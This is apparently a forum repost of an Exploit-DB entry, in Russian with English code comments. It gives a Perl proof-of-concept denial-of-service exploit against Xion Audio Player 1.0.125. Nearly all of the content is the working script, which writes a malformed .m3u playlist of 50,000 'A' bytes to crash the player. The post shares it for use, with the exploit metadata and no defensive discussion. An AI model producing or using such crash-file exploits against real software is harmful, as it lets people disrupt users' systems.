Exploit Xion Audio Player 1.0.125 - Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
14517
Проверка EDB
  1. Пройдено
Автор
S-DZ
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
null
Дата публикации
2010-07-31
Код:
#!/usr/bin/perl
# Xion Audio Player version: 1.0.125
# Author: hadji samir        , [email protected]
# Download : http://xion.r2.com.au/index.php?page=download
# Tested : Windows XP SP2 (fr)
# DATE   : 2010-07-31
#
#  thanks mo3taz  wnass cfa nta3 blida
#
#  et samir tjrs mahboul-3lik
#
################################################################### 

my $file= "mahboul-3lik00.m3u";

my $junk= "\x41" x  50000;
 
open($FILE, ">$file");
print($FILE $junk);
close($FILE);
print("exploit created successfully");
 
Источник
www.exploit-db.com

Похожие темы